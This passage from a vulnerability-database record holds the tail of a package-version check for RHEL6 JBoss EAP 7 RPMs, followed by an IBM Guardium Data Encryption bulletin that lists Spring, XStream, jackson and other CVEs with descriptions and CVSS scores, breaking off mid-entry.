reference:\"eap7-hibernate-core-5.1.12-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-hibernate-entitymanager-5.1.12-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-hibernate-envers-5.1.12-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-hibernate-infinispan-5.1.12-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-hibernate-java8-5.1.12-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-infinispan-8.2.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-infinispan-cachestore-jdbc-8.2.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-infinispan-cachestore-remote-8.2.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-infinispan-client-hotrod-8.2.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-infinispan-commons-8.2.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-infinispan-core-8.2.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-common-api-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-common-impl-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-common-spi-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-core-api-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-core-impl-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-deployers-common-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-jdbc-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-ironjacamar-validator-1.4.7-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-annotations-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-core-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-databind-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-datatype-jdk8-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-datatype-jsr310-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-jaxrs-base-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-jaxrs-json-provider-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-module-jaxb-annotations-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jackson-modules-java8-2.8.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-logmanager-2.0.8-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-cli-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-core-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-eap6.4-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-eap6.4-to-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-eap6.4-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-eap7.0-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly10.0-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly10.0-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly10.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly10.1-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly8.2-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly8.2-to-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly8.2-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly9.0-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly9.0-to-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-server-migration-wildfly9.0-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jbossws-cxf-5.1.10-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-compensations-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-jbosstxbridge-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-jbossxts-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-jts-idlj-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-jts-integration-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-restat-api-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-restat-bridge-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-restat-integration-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-restat-util-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-narayana-txframework-5.5.31-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-api-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-bindings-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-common-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-config-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-federation-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-idm-api-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-idm-impl-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-idm-simple-schema-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-impl-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-picketlink-wildfly8-2.5.5-10.SP9_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-atom-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-cdi-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-client-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-crypto-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-jackson-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-jackson2-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-jaxb-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-jaxrs-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-jettison-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-jose-jwt-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-jsapi-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-json-p-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-multipart-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-spring-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-validator-provider-11-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-resteasy-yaml-provider-3.0.25-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-undertow-1.4.18-4.SP2_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-undertow-jastow-2.0.3-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-7.1.1-4.GA_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-elytron-1.1.8-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-http-client-common-1.0.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-http-ejb-client-1.0.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-http-naming-client-1.0.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-http-transaction-client-1.0.9-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-javadocs-7.1.1-3.GA_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wildfly-modules-7.1.1-4.GA_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wss4j-2.1.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wss4j-bindings-2.1.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wss4j-policy-2.1.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wss4j-ws-security-common-2.1.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wss4j-ws-security-dom-2.1.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wss4j-ws-security-policy-stax-2.1.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-wss4j-ws-security-stax-2.1.11-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-xml-security-2.0.9-1.redhat_1.1.ep7.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"eap7-activemq-artemis / eap7-activemq-artemis-cli / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ibm": [{"lastseen": "2022-08-04T13:01:23", "description": "## Summary\n\nThere are multiple vulnerabilities identified in IBM Guardium Data Encryption (GDE). These vulnerabilities have been fixed in GDE 4.0.0.4. Please apply the latest version for the fixes.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2017-7957](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7957>) \n** DESCRIPTION: **XStream is vulnerable to a denial of service, caused by the improper handling of attempts to create an instance of the primitive type 'void' during unmarshalling. A remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/125800](<https://exchange.xforce.ibmcloud.com/vulnerabilities/125800>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2016-3674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3674>) \n** DESCRIPTION: **XStream could allow a remote attacker to obtain sensitive information, caused by an error when processing XML external entities. By sending specially-crafted XML data, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111806](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111806>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-10237](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10237>) \n** DESCRIPTION: **Google Guava is vulnerable to a denial of service, caused by improper eager allocation checks in the AtomicDoubleArray and CompoundOrdering class. By sending a specially-crafted data, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/142508](<https://exchange.xforce.ibmcloud.com/vulnerabilities/142508>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-4702](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4702>) \n** DESCRIPTION: **IBM Guardium Data Encryption (GDE) specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. \nCVSS Base score: 4.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171937](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171937>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2019-4160](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4160>) \n** DESCRIPTION: **IBM Guardium Data Encryption (GDE) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/158577](<https://exchange.xforce.ibmcloud.com/vulnerabilities/158577>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2019-11272](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11272>) \n** DESCRIPTION: **Pivotal Spring Security could allow a remote attacker to bypass security restrictions, caused by a flaw in the PlaintextPasswordEncoder function. By using a password of \"null\", an attacker could exploit this vulnerability to bypass access restrictions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/166568](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166568>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2019-3795](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3795>) \n** DESCRIPTION: **Pivotal Spring Security could provide weaker than expected security, caused by an insecure randomness flaw when using SecureRandomFactoryBean#setSeed to configure a SecureRandom instance. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N) \n \n** CVEID: **[CVE-2019-3774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3774>) \n** DESCRIPTION: **Pivotal Spring Batch could allow a remote attacker to obtain sensitive information, caused by improper handling of XML External Entity (XXE). By persuading a victim to open a specially-crafted file, a remote attacker could exploit this vulnerability to obtain sensitive information from the system. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155922](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155922>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2018-15756](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15756>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151641](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151641>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-11040](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11040>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to bypass security restrictions, caused by a flaw in AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView. By sending a specially-crafted request, an attacker could exploit this vulnerability to perform cross-domain requests. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145413](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145413>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2018-11039](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11039>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to cross-site tracing, caused by a flaw in the HiddenHttpMethodFilter in Spring MVC. By persuading a victim to visit a specially-crafted Web site, an attacker could exploit this vulnerability to cause the victim's browser to invoke a TRACE request to return sensitive header information including cookies or authentication data from third-party domains. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145412](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145412>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-1275](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1275>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141565](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141565>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1272](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1272>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote authenticated attacker to gain elevated privileges on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain elevated privileges. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141286](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141286>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-1271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1271>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to configure Spring MVC to serve static resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141285](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141285>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-1270](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1270>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141284](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141284>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1257](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1257>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to a denial of service. By sending a specially-crafted message, a remote attacker could exploit this vulnerability to perform a regular expression denial of service attack. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/143316](<https://exchange.xforce.ibmcloud.com/vulnerabilities/143316>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-1199](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1199>) \n** DESCRIPTION: **Pivotal Spring Security and Spring Framework could allow a remote attacker to bypass security restrictions, caused by the failure to consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker could exploit this vulnerability to bypass access restrictions and gain access to the server and obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138601](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138601>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2016-9878](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9878>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by the failure to sanitize paths provided to ResourceServlet. An attacker could send a specially-crafted URL request containing directory traversal sequences to view arbitrary files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/120241](<https://exchange.xforce.ibmcloud.com/vulnerabilities/120241>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2017-4995](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4995>) \n** DESCRIPTION: **Pivotal Spring Security could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the default Jackson configuration. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/135391](<https://exchange.xforce.ibmcloud.com/vulnerabilities/135391>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1000632](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000632>) \n** DESCRIPTION: **dom4j could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation in multiple methods. By sending a specially-crafted XML content, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148750](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148750>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-4687](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4687>) \n** DESCRIPTION: **IBM Guardium Data Encryption (GDE) stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171823](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171823>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2019-12814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12814>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a polymorphic typing issue. By sending a specially-crafted JSON message, an attacker could exploit this vulnerability to read arbitrary 